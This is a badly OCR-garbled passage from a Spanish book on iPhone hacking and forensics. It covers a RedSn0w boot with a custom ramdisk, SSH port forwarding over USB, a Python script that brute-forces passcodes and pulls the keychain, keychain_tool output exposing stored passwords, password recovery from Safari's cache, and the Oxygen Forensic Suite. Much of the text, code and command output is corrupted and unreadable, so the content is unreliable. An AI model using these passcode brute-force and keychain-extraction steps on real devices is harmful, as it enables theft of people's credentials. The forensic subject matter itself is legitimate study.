I  m  agen  05.13:  Mod  itic  a(Jor;;s  p  en n  i  L  i  do  s  ei i  RedSt}  Ow . 


Capitulo  K  ¿Phonc  DataFrn/eí^íiof? 
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ParH  poder  exptomr  de  manera  eíicieiite  las  características  de  las  liciraTriiünlaü  de  Dararroííp.ctfúfi, 
se  debe  aiTancai  la  Rt-dSnOw  (HcmimieTiía  utilizada  para  realizar  ^¿í//¿rcaA:  a  dispositivos 

iPhane),  con  una  serie  de  mndificBjdores.  Lstos  modificadores  son  los  siguientes: 


Alomhre  del  parámetro 

Explicación  ' 

ipSM? 

Ulilizatlo  para  cargar  iiua  versión  específica  de  fichero  IPS  W. 

—ramclisk 

Carga  una  imagen  RAM  específica. 

—keníeicache 

Usa  un  fichero  kemelcacht-  cspccífTco- 

VdLplhi  Q^M:  Mpdificadíjrc?  cspedfiííos  ^nRedS^iOw.  ' 


Lina  vez  arrancada  la  aplicación,  se  piocedeiía  de  la  misma  inancra  que  si  se  ñiese  a  realizarse  un 
JaÜhreük  a  un  dispositivo  tPhane. 


ÜTiagen  05.14:  an^nqiie  da  lieíramieírtu  Ri-’dSfíüw. 


Una  vez  que  el  disposilívtj  se  encuentra  en  fuiicionainiento,  las  características  de  red  no  se  encuentran 
habiliüidas  por  defecto.  Para  solucionar  esta  casuística,  se  pueden  utilizar  las  capacidades  de 
miiitiplexado  USB,  las  cuales  proveen  de  cíniceLividad  TCP  sobre  USB.  L.n  este  caso  se  podrá  dai 
uso  de  conexiones  SSH  a  travos  de  este  canal. 

Para  ello,  las  herraniieTitas  de  DataProtcctiou.  proveen  de  mi  scrtpí  llaniadu  el  cual 

es  utilizado  para  redireeciorLaf  los  puertos  22  y  1999,  ambos  utilizados  por  el  dispositivo  para  lá 
jj^^municación  eaíre  terminales. 

r - - - - 

1^  GÍL¥V+ndows\s>'ste[in2\)aTi£L£w  irSriy.hat 

is  ilue  rKeick :  Nreln  'j-bat 

.:siluer3wj.cksví:  5\r'fthBii27Spijtlwn,fljtií  (. lay - pv  22:2222  S9nfl2F;9ñFI  1999:1999  123^:1234 

.ForwurdiníT  locail  port  2222  Iv  ramuti;  :port  22 

nmi^UArdin^  local  part  Lu  jevnoto  íwrt  B906 

irDi'uardin^  local  port  1VV9  tu  penóte  part  1999 

TDrwarding  local  purt  1234  tu  iwnote  port  Í234 

Imagen  05. 1 5:  Rfidireccíóri  de  pu ellos  a  Uavés  el©  liiaiiiwiimbs  . . 
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Passcodc 

J_ll  arranüíir  c!  dispositivo  sii  modo  DI  U,  posihiliLa  que  se  puedan  exploíar  vnlrierabilidades  en  el 
propio  dispositivo,  eomo  por  ejemplo  aquellas  que  permiUiTi  saltar  la  compro bación  de  firma  de 
seguridad  de  ticheros.  lista  posibilidad  permite  que  se  puedan  cargar  imágenes  de  arranque  con  las 
herramicTiLas  uecesarias  para  poder  realÍ7ar  los  ataques  con  éxito,  saltando  así  1a  veriricaeióu  de 
tirinas - 


Una  V02  generada  la  imagen  de  arranque  maliciosa  e  myecTada  en  memoria,  esta  posibilita  que  se 
puedan  realizar  otros  ataques,  como  por  ejemplo  la  fuerza  bruta  de  credenciales.  Fl  ataque  basado  en 
la  predicción  do  credenciales  basada  en  fuerza  bmta  es  posible  debido  a  dos  factores: 


La  protección  por  software,  que  elimina  el  conTenido  del  dispositivo  una  vez  sobrepasado 
el  umbral  de  diez  credenciales  erróneas,  y  que  no  furteiona  a  bajo  nivel. 

-  La  fuerza  bmta,  que  se  realiza  utilizando  el  procesador  del  propio  dispositivo. 


Para  ello,  las  berramientas  de  DüíctPf^tection  penniten  que  se  realicen  ataques  basados  en  Fuerza 
bruta  basada  en  PIN  o  en  creticneiales  más  robustas. 


iT  z  ; 

print  "itmng  tr^ra  ta  bruterorcc  i 

if  cheíácPiusccdeCotnplcxityCrlierit)  0 : 

print  ''TrynTin  a  11  4-iJigit:s  passeodes. » - 

bf  =  el  i  ent .  6r  atufar  ccKeyfiag  ienfib  ag  [ KeyÜ  agKeys  ]  ,  d  at  a) 

1  í  b  r : 

di  .updatf^thi  ^ 

fceybaga  [kbujidl .  updütKtjf) 

ni:  kb.  uní  £>ckWitlira3!;rníieKey íbr .  y eLC“passcod«Kei<'">  -  íÍEí:odeí"hrir">> 

Icb .  pi- 1  n  Í.C1  as  sKey s  Q  , 

di  [^^1  =  kb.  yetClearClassKevsDi^tO 

di  .  savíQ 

e'  se  í  .  -  .  L  ■■ 

pHnt  "Complex  passeode  used^  trying  dicticnary  arrack  ... 
rficti  íle  ”  os.path.  jointcurdir,  «ordli-^t. di lL 

try: 

wordlist  -  openCdict-File,  V '  J .  r  eadlinesQ 
excepft  (OSCrror ,  TaErrorJi  ei 
exitCe) 

■Fnr  line  m  nurdlist;  ^ 

res  =  Client  .  0f‘l-Paj5scadtKtiy(systfinbagrKe‘í'BaQKaV'5  line.r^tnpí  \íí 

1  f  k  b.  LJ  ni  o  ckWi  t  hPas  s  codaKey  ( r  e  ^ .  y  e  t  C  "  pas  5  .  ri  ecodeí  h  ex  5  )  : 

print  ’Possrnííp  \“55s\"  OK”  %  line.ratripf '\n‘ ) 

(ti .  upria-cerreal 
ktíybags[kbuLJÍd] .  updat«íres) 

di.savcO  ,  - 

key dh ai n_b1  ob  —  íil i ert . H nwn  I oatíF il e ( " / mirtZ / Kty ch ai /Icevc hai n  £ . nh  J 
Vjrite_fÍlcClí^y^ti2in-2.  db'\  keyííhain_blob^  ^  « 

pn’fit  "Ltownloaded  keychain  datjübEi^e,  use  keychairL-^aol .  py  to  decrypt  -seLrííts 
rft  ijrn 

print  "Passcoiie  nat  fotíndi" 

returrl  _ 


Imagen  05.16:  Extrae; lo  de  fiiéi-7;a  hmta  de  passcoáe, 


No  hay  que  olvidar,  qtie  el  éxito  tic  este  tipo  de  ataques  se  basa  en  la  Fortaleza  de  la  credencial  que 
tenga  implejiieiiíada  el  dispositivo.  En  el  caso  de  una  credencial  basada  en  PFN  (4  dígitos),  este 
ataque  se  realiza  con  éxito  en  un  plazo  máximo  de  unos  20  minutos.  Para  otro  tipo  de  credenciales, 
el  éxito  dependerá  del  tipo  de  diccionario  y  de  las  iteraciones  a  la  hora  de  probar  credenciales.  A 
continuación  se  muestra  una  tabla  que  estima  el  tiempo  necesario  en  fimeión  dcl  passeode: 


lOi 
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Complejidad  de  la  contraseña 

Tiempo  es  timado 

4  dígitos 

20  minutos 

4  caracteres  al  fanum críeos 

51  doras 

5  caracteres  alfa  numéricos 

8  años 

8  caracteres  alfanuméricos 

13.000  años 

O'i  0^:  E-sfim¡:Lc:i6i!  en  tiempos  de  iib  ataque  ba?;ado  en  ñi¿r¿íi  bmlii 


Eü  la  siguíenLu  captura  de  pantalla,  se  puede  obseii^  ar  un  uüiqiie  exitoso  de  ñien:a  binta  de  curiLrascfía 
utilÍ7ando  esta  técnica: 


[mageii  05.17:  Aíuque  basado  cu  fuerza  bruta  de  corirasena. 

Una  vez  que  se  pueda  inyectar  en  el  dispositivo  una  imagen  de  arranque  maJiciosa,  la  ventana 
de  exposición  aumenta  de  tbrina  exponencial,  en  cuanto  ai  iiLiineio  de  ataques  que  posibilita  esta 
técnica. 


KeyChain 

Con  ios  datos  aiitenores  se  hace  posible  por  ejemplo,  atacar  directamente  a  la  base  de  datos  keyCham, 
la  cual  es  descargada  autnm áticamente  con  el  ataque  anterion  Si  el  ataque  a  la  base  de  datos  kx^yChcim 
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es  exitoso,  se  podrán  obtener  las  credenciales  de  las  principales  aplicaciiines  y  servados  que  se 
gcsLioiiaii  desde  el  dispositivo,  üsras  crctlcnciales  atenderán  por  ejemplo  ai  correo  elcelnmieo,  la 
claves  de  aeecso  a  una  Wi-Fi,  etcétera.  Para  realizar  con  exito  este  ataque,  las  herramientas  de 
DataFrotcction,  incorporan  nn  scripl  llamado  keyCham-tooli^l  fiincionamicnto  de  este  scrípt  es 
bastante  sencillo,  solicitando  solo  el  lugar  en  donde  está  la  base  de  datos  keyChain,  y  el  fiebero 
PLIST  que  eonleiidrá  las  claves  necesarias  para  poder  ílescifrar  el  contenido  de  la  base  de  datos. 

rlpCl 5 act  3caB4tí  LLSfiiJülír  ?01i<y lceyr> 

<c ict> 

<lcey>K)ey!laq 

^íiarra> 

REFk0íW^ERWIÍV3TAAAAEAAAAA3LWlJI-  ftAAfiKAAAAAHW’yUl  CAAAA 
EI3pV5lí+qE\.'Mnl'Jjf  pDÍf'KI-  I  ílJNL.WIAKLwLwjKHSlrK}E+OCVEQn 
9v5bl »  W I  /AnM?lí5vPHllK4PVJl5KCT:.íLJCHUFVXUkF(ÍAJAAEAAAAAFT 

QEJXUAAAAFF\'£J  LudSUZWbl{)WFclWiaifWt:qn  GESVRFUqftAAAIlAAMPíl  i 

\VVJRAAAAEOÍXlKHMa3.MtllKEFK+0nvt  ^  1  Itííy  EUwAAAAqAAAALVl 2  B 
UlAJVAAAQAAA.<M]íVl  UJ  M  (^ftÁACCnSXLtl^TFlST  I B  ^-l-SS-l-DGRry  SYQPÍ 
h  FF  l  Id  ^  d£Xfcí2RlWSUC^Al"M^AÍlSy  ZKDlX  TSiilV/ürTU  Í*,2BÍCNPiqVM  A 
AAAE  AAjV<  1  dSQVAAAAAE  AAAAAlCQEl  k  AAAAÍi/l  1  /  ¥  1  OybílXr  KH^ 

BnSEMVtJíKÍXyVGPcFFPGÍl  7Mrw4rCtzXLZdL  Dfl  ¿t WEUQAAV^.í'' fc3d 
h VV^RWl.  XI  X *! yi  {iFzr  UWÍCiyM A^/ií\£í^AA.íWEVdSQVAAAAAEAAAAAldQ 
5lkAAAAuL+KKL  Fwt  LY^IE&t^íSSpQtYqf  KK7  Ocf  [ÍKWftlil  pía6khdX 
gDpí-vha  lí?uwsuqAAAAq,zaA^riflfil  iHi+Míiiuqri7hí)íi£mCLVMAAAAE 
AAAACF  d  sev  AiAAA4F  AAAA<^VcCfSl  kAAA/igOd  'SUlDPVÍzdqaQSMOREja 
TtW'Üf<XL334kRqiíZC  1  íam^pWEl  EAAAAEANIOXEzqL^  1  JCtütiprw 

SB  p  DTE  FTAAAA5  AAAAACXUfcFqAÍ  AARAAAPX!MXLiLi:¿  A^AAJÍOlt  llfr  i  W 

dLDnDFl  esrxvi  Zcr  ?ni.1  FTic^3vf3ZL':jvSub/JPlPL  E/sílwS'VvajiE 
AAA^KÍ  iVZ  NEhYOl  5  Vl«2  3  SBTELL  pETTÍ  FTAMAB  WAAZXLJfcFQ#iAA,^ 

EtZAAAAKEl ñLKH hkp4 RVVííPifiWr E 1 1 •MlKyW  1 1T/TL 3.115 ú r 
l€:hp^AV{EL  Sbyaitf  kz  C6 1  wi.  1 1 .  aa.^ae  it<^n- Ay  Lt^UNFuiíet  lucí  Pfid  o 
TEFT■AA£U^^tAAA«VXlJk^3AAAABí^'lv^Aí\^JXL■E1:ZAAAAKM/i  rtJEBMVJ  k: 

Xa4E05Sh^lAyx7Hl.yO-Vr  KDLfXVYlTVH<>^t  ai  3  FprxkWrt  Jl  ftAiA 
EJqV  lnCÍE'v^qpqVP^CtiC'ñ  IXltd-  l  AAjftAfi.iWiAANXJkriCiAAAABiA/iA 
AANXL  Etz  .AAP AK  ITWrff  U I J  CUD]-  inH  ZlOkPdlf íilíwmi  Al  LSKJlfcsf 'íflMXUq 
l,FE  OVfllIDtZVC pOKL WL 1  E A.V'lAEOaZVí  f  Xr,/  J50 1  Yíftl  qHL VLE  plJTF  F  1 
AAAAE/Jd\AA IXUkFOAAAAE AAAAAfDtLi E rZ AAAA EL  íiT  nfi! J r AWH pzF LH 
116lX/0CdqKT0T7lzTXxyJ  izSJSízpbrHnff  i  yrcJMVvtJl  laaaaegrS 
ZPIf  pESDrFhüd/hZprf  «13  f  Lt  |jAAAABAAÍ/iAFXUkFQAAj\^EAWLANX 
I  jFTF AAAJklt  JSWO J  kE  JA/ c!  itíKXu  LküL  kE>TCSSy N'^^OQqhzc  5  RBv 
yuji.  dOrPS  S’/TEt  tfOÁAAAFM  Ef  /  3  k/\*rJ.SV^¿V  tlfii  >S  1  gi  jn*4+  pE 
</data> 

<-k'i»y>pfl.'r,í;ru>Elc  f/kcy> 

C5tr  í  ng> 

<Srín^^i™Í3ft49fÍ58b0331:j29a9t>134753deqci82Oc3tyJ/zbü2b6  apzdí!  </ín:r  i  iiy> 

_ - — - ^ ^ - 

ImugEío  05  JS;  Extracto  de  ficlieiai  PLIST  con  claves  para  dciL:ifrur  la  base  de  datos  h^y Chain.  . 


RsLc  scripl  viene  implementado  para  extraer  dcnicnias  tan  interesantes  como  las  contrasenas 
utilizadas  en  aplicacitines  de  Intemet;  o  extraer  únicamente  el  almacén  de  eeriiflcados. 


I  r  \VV1n  /\s>!St3!Ti32'i:  ridiSífi 


G:\ir-hfine\iIesciri?ad«M:uri|iCií>iíytÍ3on  k««jclmin_tonl  .py  -ñ  .  .Ykeycitain-2.dli  -  .\3brtJÉfllld£374r  Gfe.plist 
Kcybag;  SIGH  tíhiiuk  OK 
Kevbag  tinluukffd  isasscode  kí?»/ 

Keyclidiiii  veras  icn  t  4 


Paí  5wprd.s 

Surííice  : 
Reevunt  : 
PíiES\«rd  ■ 
fisfspp  -  copi. 

l[H.tS>-applje-CDiii 

<binary  ;  a9[:6?cbaiB2líaaJti8ebe59®Gd0dCGJ 

.applK .  ñ]|»  d 

S  eru  ic  E  : 

FnbancedUciceu^il 

ñeco un t  í 

4 : 34éBfc2'/U  ■  UMK32  DCEniSS :  unbí  t  MftPiflCMEi; 

P;»ííawcrd  : 

KÍHtJÍMjt 

ñg^rp  :  apylt? 

Service  : 
RccGLint  - 
PassMord  a 

-  applf; 


fiierPort 

G  er  eicicrcnnin  n _ íííii  1 

<  W I -í 1 >OMO_Kx  e  c  n lea . 2  ail <XU I -f i> 


Imagen  05 J 9:  Visuallzaciún  por  piiubilbi  de  elémejtas  en  la  base  dc  datos  . 
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Bn  el  caso  de  que  se  deseen  visualizar  por  pantalla  los  elementos  principales  que  se  encuentran  en 
la  base  de  datos,  el  scrípí  viene  preparado  con  un  parámetro  específico  para  esta  tarea  unitaria,  tal  y 
como  se  puede  ver  en  la  anterior  imagen. 


Caché  en  Safari 

Otro  vector  de  ataque  se  puede  encontrar  en  la  gestión  que  realiza  la  aplicación  Safan  de  los 
datos  y  peticiones  que  realiza  la  aplicación  eiuindo  se  navega  a  través  de  esta.  Debido  a  que  estas 
aplicaciones  necesitan  optimizar  al  máximo  el  rendimienfo  para  niejorar  la  exxperiencia  dcl  usuario, 
en  algunas  ocasiones  estíi  optimización  perjudica  aspectos  como  la  seguridad  de  la  información. 
E!  mayor  ejemplo  se  encuentra  en  la  gestión  de  datos  que  realiza  la  apHcación  Safari  de  muchos 
de  los  datos  solicitados  a  través  de  ella.  Para  optimizar  las  peticiones  así  como  los  datos  enviados 
y  recibidos.  Safari  gestiona  una  base  de  datos  de  caché  en  donde  almacena  información  sobre  la 
navegación  de  un  usuario.  Esta  base  de  datos  por  defecto  se  encuentra  en  la  Siguiente  ruta: 

TSser  Librar)-  >  Caches^  com.applejnobiíesrfúri 

La  estructura  de  la  base  de  datos  comprende  campos  con  nombres  tan  interesantes  como  cúche_ 
respfínsc  o  cache  mcetvcr  data.  La  estructura  completa  es  la  siguiente: 


íma^n  05  JO:  tistmerura  bíisc  de  díitos  Cíteft^  dh. 
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Navegando  por  la  estructura  cfmi  cache_réiceíver_daia,  se  pueden  encontrar  desde  hojíLs  ció  estilo 
C:SS,  hasta  scrg/ís  de  verificación  de  usuario  y  contrasofia. 


iii-iagen  0S.21 ;  Usuarios  encoti  Erados  en  base  de  da  Los  dti  cache  de  Snjbfi. 


Buscar  con  las  palabras  pass^vord  o  pwd  sobre  esta  base  de  datos,  puede  arrojar  resultados 
intorcsaiilcs  a  un  atacante,  debido  principalmente,  porque  si  a  través  de  la  aplicación  Safan  se  han 
realizado  petición  os  do  au  le  ritic  ación,  es  altamente  probable  que  la  aplicación  Imya  almacenado 
tanto  las  peticiones,  como  las  respuestas  en  esta  base  de  datos. 


D I  aíiM  p  t  p ;  íí  2  3  Fb  gÍ&4u .  baiil  6  4  -  pi  aíI  .  i  lu  e  -  c  o íiüc  ZPfiK  2  .  nv  c  x3  F  le  ?:  t  S 1 4  &  le  =265  Sft  id  -b  ^  fe  =1 

305553  -tTSPPFT  -Í?V  JnílEnyiaíHJ  ijílFSLGXHÉKKu^  xr^WlOKBqFRltU  Je  Otlir  h 

líiBnGc  Fuflf  iiTj;  Rí^PKgPwT  i'fllVZZSxíBZDaEK  ¥Xatw‘71c[M:phbC90ti7TMcBQCGbQziaiÍMa  i  VHVr  T  q^rKMGBFiuAu  ¡idvfeHy 

5G I  i.t4IIUftLoglni>pt  irtn5t=í  RHr ullííRr-líiífa  biieFuí:  t^lfiPPSX  =Pass  Bort8<riJdr«a=*:ty]pe  =11&  Í3-S2fi95&nl 
0&n3 ii 2  =lfc3 cpa'in  =d Oñt ríibn r-lin r;í'4aiiritna±l.i: i>i«B:pae s wd=12 3 abe  .2011  0 5-1  &  1 9  : 2 5  i llN 
http=//íYfx3.riDtiiiall.Cíiik-'Ei»all^lR.4.S89&.04(íMi/ni  tCíFinon  -  js2011  0^1^  1?;25:44E 

btt  p  5  !  lo  H  ir  .  1  iu  e .  c  btV^PI«  R  rJ  i  r fs.^n  st  .  s  rf  ?wjl-vh;  iyi  i  iíil  -  n  u  =i  1  J  ^  n  i  -  Hb  ^  HS^-n 


liüttg^íhOS  22:  CouiTiísefia  epcí>ntrada  en  base  de  datos  ¿^ache.db. 
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Capítulo  VI 

Análisis  forense  de  datos  de  un  terminal 
iOS  con  Oxygen  Forensic  Suite 


1.  Introducción 

Tanto  sí  se  ha  accedido  a  uo  backiip  de  nn  terminal  iPhone  en  el  equipo  donde  está  pareado  el 
dispositivo,  como  si  se  ha  accedido  al  backifp  en  Apple  iCíoud,  o  al  propio  terminaL  es  necesario 
analizar  los  datos.  Como  se  ha  visto  en  el  capítulo  de  Captura  y  Análisis  de  un  backnp  iOS,  es  posible 
extraer  datos  muy  jugosos  anal  izando  las  bases  de  datos  SQlJte^  los  ficheros  de  configuración  en 
formato  XML,,  Flísr  o  EpUsf,  e  incluso  las  Binmy  Cookíes. 

Sin  embargo,  el  volumen  de  datos  es  tan  grande  que  un  usuaiío  puede  estar  varias  semanas 
analizando  los  datos  con  Scripts  o  ni  anual  mente.  Es  ¡x)r  ello  que  en  el  mercado  existen  herramientas 
profesionales  que  son  capaces  de  analizar  los  gigabyíes  de  datos  que  tiene  un  Smanphorte  para 
presentarlos  de  fomia  rápida  y  eficiente.  Si  el  tiempo  y  la  reducción  de  costes  en  procesos  de  análisis 
forenses  son  cruciales,  el  gasto  de  una  licencia  profesional  es  masque  recomendable.  En  esta  sección 
se  va  a  presentar  una  de  estas  herramientas,  que  además  cuenta  con  soporte  en  idioma  castellano. 


Análisis  de  datos  de  un  dispositivo  iOS  con  Oxygen  Forensic  Suite 

O.xygen  Forensic  Sitiie  es  una  herramienta  comercial  para  el  análisis  forense  en  telefonía  móvil. 
Aunque  es  compatible  con  la  mayoría  de  los  teléfonos  del  mercado,  esta  solución  se  especializa  en 
Ja  extracción  y  análisis  de  datos  en  sinariphoncs,  apoyándose  en  un  interfaz  intuitivo  que  muestra 
toda  la  información  del  dispositivo  en  cómodas  pestañas,  junto  a  la  opción  de  generar  informes 
completos  en  diversos  formatos. 

El  hecho  de  simplificar  numerosos  procedimienios  Lecnicus  en  tan  solo  unos  clics  hace  que  esta  sea 
una  atractiva  opción  a  tener  en  cuenta  para  los  usuarios  que  necesitan  im  uso  intensivo  a  la  hora  de 
analizar  numeroaos  dispositivos. 

La  siguiente  captura  muestra  la  infontiación  que  Qrvg^rí  Forensic  ptir  defecto  es  capaz  de  extraer 
de  un  teléfono. 


106 


tiaddng  de  dispositivos  iOS:  iPhone  ct  íPad 


liifoimS'ciñiib  asic-a  dieltñléfcrLO  inó^il  y 
dates  cte  la  SIM. 


La  fea  deiiointaíáos^ncliii'iosloE 
número  s  de  m¿  vtLcs^  líneas  fij 
íiirecciaiies  postales,  fotos  de  eontaetosy 
otra  infoTinació  n  de  contacto). 


Llamadas  Períñdas'Lwedí;  idas. 


Batos  áe  la  taridra  5IM. 


Infoimacrón  de  Lfeiiadas  sateintís. 


\\y 


nii 


Or^anb:aelor(riemHoneE, citas  del 
calenda  rio,  liotas,  rece  r  datoEÉOS  de 
flama  di  amveisanos  y  císnpkaño  s, 
tareas  a  reaEsar). 


Notas  de  Texto. 


Mensajes  SMS  (mensajes,  i-e^stno, 
caip  ^as,  ir^nsajes  lid  tía  dos  con  algunas 
restricáenfis). 


C  aché  de  ios  na  v  egi^duies  Web  y 
""  favoritos. 

i 

Eioteccicn  de  datos  de  Integri  dad  con 
^  .  i  MD5,  SBA-L  5HA^2,  CltC,  HAVAL 
kJm'.  GOSTD34.11-94. 


Mensajes  imdtkneífla  con  andwos 
ai^iintos. 


Mensajes  de  E-^aiaii  conardtñv  cs 
adj^tos. 


TtPES,  EDGE,  CSD,  HSCSD  y  trafico 
Wi-H  como  registro  deimdo  de 
sesiones. 


Folopafía  k  erinágenes  de  la  galería. 


Vídeos. 


Las  notas  de  vozy  cl^s  de  autfco. 


To  dos  ks  aicMvos  de  la  memoria  del 
tdefemo^así  como  de  la  taijefede 
memoria  Oash,  ¡ncluyendo  las 
aplk'.a dones instaladas  y  sus  datos. 

Base  cíe  datos  de  KacÉo  FM  feadones 
(coTiTo  paite  de  Ercplorador  de  aicísvcs). 

Actividad  ñ^lJfkblog:  to  dos  los  eventos 
princ%)aies  con  las  cooidenadaá- 
geográficas. 


Iiuageii  Ó6.01:  Distim  ínfonnación  que  OMgei7  Forensic  eí»  ouptiz  de  extiaei. 


En  2002,  Oxy[s,ef¡  Software  inventó  la  aplicación  avaiiMida* 'Agente”  que  permite  a  laómtede  Oxygen 
extraer  mucha  múa  inroniiación  de  los  teléfonos  inteligentes  que  otras  herramientas  lógicas.  En  el 
caso  de  iOS  cabe  destacar  que  Oxygen  Foremic  Suile  pemnte  extraer  y  analizar  datos  almacenados 
en  los  archivos  de  copia  de  seguridad  hechas  por  iTunoi  o  iCloud. 
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El  proceso  de  captura  de  datos  de  un  iPhone 

Ox^^gen  Forensic  Suite  se  alimenta  de  varios  tactores  a  la  hora  de  conectar  y  extraer  la  hitormaclóii 
de  mi  termina!  móvil,  dependiendo  del  si  a  Lema  operativo  del  lele  fono  móvil  sobre  e1  cual  se  quiera 
realizar  el  análisis  forense  ss  utilizara  uno  li  otro  méiodo.  En  la  siguiente  tabla  se  muestran  los 
métodos  que  utiliza  la  hen amienta  para  la  extiaccióii  de  estos  datos. 


Siscema  Operativo 

Modo  de  Extracción 

Requisitos 

Andwíd 

Utiliza  Agente  Oxy^Agem 

Memoria  Externa  >1 MB 

Biackbetry  (RIM) 

Utiliza  Blackberty  Desktop 

iFhone  iOS  (Apple) 

Utiliza  ITimes 

Nokia  Symbian 

Utiliza  Agente  Oxy-Agent 

Memoria  Externa  >IMB 

’labJa  Ü6m :  Métodos  de  extracción  de  datos  por  sistema  operativo. 


Para  la  correcta  utilización  de  Úxtgen  Faremic  se  recomienda  la  uLilizaeíóu  de  cables  USB  y  dnvers 
ori  g  i  u  al  es  pro  po  re  i  o  n  ados  por  e  1  fabri  c  ante 

Es  fundamental  para  cualquier  heiTamienta  forense  conservar  la  estiiictura  de  fichaos  intacta  para 
no  alterai’  posibles  pruebas  en  una  investigación,  por  lo  tanto  Oxygen  Foremtc  permite  antes  de 
realizar  la  extracción  definir  qué  modo  de  "PlasMng"'  se  va  utilizar,  añadiendo  a  la  vez  un  método 
de  extracción  utilizando  los  agentes  Oxy-Agenl  que  se  nistalaran  en  una  memoria  externa  dedicada^ 
ev  i  Lando  asi  cualquier  manipulación  involurtaria.  Una  vez  terminada  la  extracción  el  agente  se 
desinstalará  automáticamente  y  la  información  extraída  se  presentara  en  modo  “Read-ünly^’  para 
realizar  la  investigación. 

Eu  la  siguiente  captura  se  muestra  el  inicio  de  la  creación  de  un  nuevo  eELst>  en  el  Oxigm  Forensic^ 
dt>nde  antes  de  comenzar  con  1a  extracción  se  solicita  rellenar  esta  ficha  eligiendo  el  tipo  de  Ilash 
que  interesa  utilizan 


Jmdgün  aó,ü2 :  de  na  nuevo  caso  de  aiiáfisis  íbreme  goh  Oxígen  t  o}X:mlc.  7 
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A  cí>riliiiuaciÓ!i  se  detallan  los  pasos  a  seguir  para  ejecutar  un  análisis  forense  en  un  íPhone,  en  este 
caso  de  la  gama  íPhone  4, 

Antes  de  comenzar  la  extracción  hay  que  asegurarse  de  que  se  cumplen  los  siguientes  requisitos: 

Se  dispone  del  cable  original  USB  suministrado  con  ei  dispositivo. 

-  Se  lienc  instalada  la  versión  de  Oxygen  Foremic  Sidte  en  el  equipo, 

iin  el  caso  de  tina  extracción  de  un  telefono  íOS.  Oxygyn  Forenslc  se  apoyará  en  las  librerías  de 
íTunes  para  obtener  los  datos  del  iPhofre^  para  lo  que  es  necesario  haber  pareado  aíttes  el  terniinai. 
Fsio  quiere  decir,  que  se  necesita  contar  con  un  teniiinal  sin  passeode  o  conocer  el  passeode  dcl 
mismo  para  poder  desbloquearlo. 

Si  no  se  dan  las  circunstancias,  tal  vez  lo  más  fácil  sea  conseguir  el  sislcina  operativo  en  el  que  ñie 
pareado  el  tennioal  iPhone  e  instalar  allí  Oxygen  Foremic  Suite,  con  lo  que  ya  no  habrá  que  conocer 
previamente  el  pmscode. 

Una  vez  que  esté  el  teléfono  conectado,  OxygpM  Fomnsic  mediante  un  asistente  comenzará  a  pedir 
al  usuario  que  seleccione  las  secciones  que  desee  analizar,  pasando  a  continuación  a  extraer  todos 
los  datos  dcl  sis  Lema  auiornáiioaTriciite. 

Fara  otros  sistemas  operativos  Oxygen  Foi^mic  utiliza  un  agente  llauiado  (]>A;y-/lj^evíí'que  se  instala 
en  una  inemoria  exlenia  del  dispositivo  dejando  intacta  la  estmctiira  de  ficheros,  de  esta  manera  la 
herramienta  es  capaz  íle  extraer  numernstm  dalos  de  sistenias  como  Ándwid,  Mobííe  o 

Nokia  (Synnbian). 

Como  se  puede  obsei'var  en  la  siguiente  captura,  Oxygen  forensic  Suite  comienza  con  la  extracción 
de  firma  Lo  taimen  Le  auUiTnátiea  y  el  tiempo  destinado  para  terminar  este  proceso  dependerá  del 
tamaño  de  la  memoria  del  Smariphone  que  se  esté  aualizitndo. 


Imagen  06,a3:  Elección  de  los  tipos  de  datos  que  Oxíg.en  extiíieí  á  de  iin  detemiinado  diíEpofiitivo: 
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üita  vez  lennínatit]  el  proceso,  es  posible  descoiiectai’  el  telefono  y  empezar  a  utilizar  la  heiTUniienta 
Oxygm  Forensic  Suite  tanto  u  modo  de  etjnfiulta,  como  para  la  generación  de  lu formes  forenses. 
A  continuación  se  detallan  las  secciones  más  importantes  que  permite  k  consulta  de  datos  que  se 
muestran  en  pantalla. 


2.  Información  en  los  dispositivos 

Este  es  el  punto  de  partida,  se  puede  decir  que  es  el  índice  desde  donde  se  tiene  una  primera 
j^vfsualizaüión  de  k  información  más  vital  y  básica  como  el  niimero  de  serie  del  teléfono  (IMET), 
la  versión  del  sistema  operativo,  si  c1  Smúrtphone  está  en  modo  Jailbeeak^  v  una  breve  lista  que 
muestra  un  resunner  de  ks  actividades  del  teléfono,  como  pueden  ser  el  número  de  contactos,  los 
mensajes  recibidos/enviados,  etcétera. 


Imagen  06,04:  Resuirien  de  los  datos  extcakloy  de  iin  dispositivo. 


La  línea  temporal  de  un  dispositivo 

Uno  de  los  puntos  más  críticos  a  la  hora  de  realizar  un  análisis  forense  es  recrear  un  evento  según 
fecha,  hora,  y  detallai'  un  esquema  de  diversos  sucesos  que  ocurren  en  los  intervalos  especificados 
de  ia  investigación. 

En  ourrien]sa,s  ocasiones  se  pide  al  analista  determinar  si  este  usuario  ha  realizado  una  llamada 
telefónica  a  un  número  de  teléfono  determinado  o  si  se  ha  conectado  a  una  página  web  específica, 
por  poner  dos  ejeniplos  de  los  múltiples  que  se  pueden  dat\ 
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FormsiC  Suite  tiene  la  herramienta  más  potente  de  todo  el  paquete  de  sottvvare  en  el  Titne- 
Tlm.  Estíi  característica  de  la  herramienta  saca  todos  ios  eventos  temporales  de  todas  las  aplicaciones, 
que  van  desde  que  se  enciende  el  móvil,  IiaslíL  cualquier  otro  suceso  como  si  se  recibe  una  llamada, 
se  envía  un  correo  electrónico,  se  publica  un  TV?/,  se  conecta  a  una  red  Wi-FL  se  produce  una 
llamada  perdida  por  Sk^pe,  o  se  hace  una  íótograíla. 

lodo  lo  que  se  haga  con  el  tenniiial  queda  registrado  en  las  aplicaciones  del  sistema  y  por  tanto  en 
bases  de  datos,  ficheros  de  configuración  o  servicios  Online,  y  ÜAjgc/í  Foremic  Suite  los  analiza 
todos  y  lí>s  muestra  en  una  tínica  línea  temporal  con  un  conjunto  de  filtros  que  permiten  que  el 
análisis  se  haga  a  golpe  de  clic. 


imagen  06/15:  Ejsinpln^  de  parte  de  un  de  un  dispüíiiUvü. 


Esto  úhoira  un  tiempo  importantísimo  ai  investigador  forense.  Hay  que  aclarar  que  a  veces  las  fechas 
qne  se  pueden  ver  muchas  veces  pueden  resultar  i m pactantes  si  se  muestran  en  el  filtro  de  fechas  im 
año  como  1980,  esto  se  debe  a  que  el  pn>grama  registra  eventos  como  pueden  ser  cumpleaños  donde 
el  usuario  haya  configurado  el  año  del  nacimiento  de  uno  de  sus  contactos. 
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Aunque  el  lime-Line  es  la  heiTamieiim  má'^i  píjderosa,  desde  ella  se  pueden  acceder  a  lodo  el  resto 
de  secciones  que  Iiacen  que  un  análisis  de  un  iPhoue  o  un  iPad que  ocuíia  1 GB  de  datos  sea  mucho 
